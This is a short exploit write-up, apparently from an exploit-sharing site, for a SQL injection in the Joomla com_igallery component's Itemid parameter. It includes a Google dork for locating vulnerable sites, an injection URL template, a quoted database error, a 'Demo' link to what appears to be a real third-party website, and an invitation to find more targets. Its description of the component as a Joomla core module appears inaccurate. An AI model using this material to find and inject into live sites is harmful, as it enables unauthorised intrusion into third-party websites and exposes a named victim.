###
# Title : Exploit Joomla com_igallery Sql Injection
# Author : Dz MinD Injector
# Home : Algeria 23000 d^_^b
# FaCeb0ok : https://www.facebook.com/Dz.MinD.Injector
# Type : proof of concept
# Tested on : Windows7 & Linux
# Date : 18/01/2016
###
# <?php
# echo " Freedom t0 Palastine " ;
# ?>
# Lov3 Explo8ting Just For Fun !
######## [ Proof / Exploit ] ################|=>
#! Google Dork :
#+ inurl:com_igallery
#########################[!] Description ##################################
The SQL injection can enable an attacker to gain full administrative
access to a target website when combined with other security weaknesses in Joomla!
The SQL injection was discovered in a core module of Joomla!
"Itemid=" field in c/index.php?option=com_igallery&view=igcategory&id=2&Itemid=' is not properly sanitized, that leads to SQL Injection Vulnerability.
will cause an error:
No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near ') AND axosection='' AND axo=''' at line 6
SQL=SELECT id FROM jos_gmacl WHERE acosection='com_igallery' AND aco='read' AND
arosection='users' AND aro IN () AND axosection='' AND axo=''
#########################[!] Proof Of Concept ##################################
http://localhost/path//index.php?option=com_igallery&view=igcategory&id=2&Itemid='[ inject Here ]
##Demo :
http://mytrinityhome.com//index.php?option=com_igallery&view=igcategory&id=2&Itemid=13'
!+ Find More targets in Google ^_^
!+ Greetings to my Friends : Sige-Dz , Sami Joker , Vatou-Dz & All Algerian Hackerz !